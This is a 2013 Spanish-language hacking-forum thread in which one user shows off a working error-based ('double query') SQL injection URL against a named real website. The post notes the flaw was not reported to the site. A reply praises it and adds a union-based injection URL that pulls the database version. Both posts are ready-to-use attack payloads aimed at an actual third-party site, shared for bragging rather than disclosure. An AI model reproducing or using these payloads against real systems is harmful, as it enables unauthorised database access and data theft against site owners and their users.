Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Julio 08, 2013, 09:54:38 PM

Título: SQLI Double Query http://www.kier.com.ar/
Publicado por: Muppet en Julio 08, 2013, 09:54:38 PM
(http://i42.tinypic.com/mcyi5j.png)

SQLI

Vector: http://www.kier.com.ar/coleccion.php?op=ficha&id_coleccion=98 and (select 1 from(select count(*),concat((select (select (database()))),floor(rand(0)*2))a from information_schema.columns group by a)b)--+&page=0&PHPSESSID=7c7e4196fbbd700a469d53af8fe95b26

Reportado: No
Título: Re:SQLI Double Query http://www.kier.com.ar/
Publicado por: arthusu en Julio 08, 2013, 10:20:36 PM
Muy buena bro, tambien puedes hacer union based :P jeje saludos muy buena bro gracias por compartir sigue asi :D

http://www.kier.com.ar/coleccion.php?op=ficha&id_coleccion=-98 union select 1,2,version()  -- -
Sólo texto | Texto con Imágenes